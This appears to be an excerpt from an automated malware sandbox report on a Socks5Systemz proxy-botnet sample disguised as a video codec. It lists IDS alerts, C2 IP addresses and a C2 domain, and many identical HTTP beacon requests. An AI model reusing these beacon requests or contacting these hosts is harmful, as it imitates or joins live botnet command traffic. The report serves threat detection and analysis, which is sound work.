        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49774 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49769 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49718 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49764 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49739 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49749 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49776 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49740 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49725 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49778 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49772 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49751 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49715 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49760 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49735 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49773 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49775 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49757 -> 185.208.158.248:80
        Source: Malware configuration extractorURLs: ezebtfp.ua
        Source: global trafficTCP traffic: 192.168.2.5:49714 -> 89.105.201.183:2023
        Source: Joe Sandbox ViewIP Address: 185.208.158.248 185.208.158.248
        Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | TCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_02BC72AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,3_2_02BC72AB
        Source: global traffic | HTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1 | Host: ezebtfp.ua | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1Host: ezebtfp.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
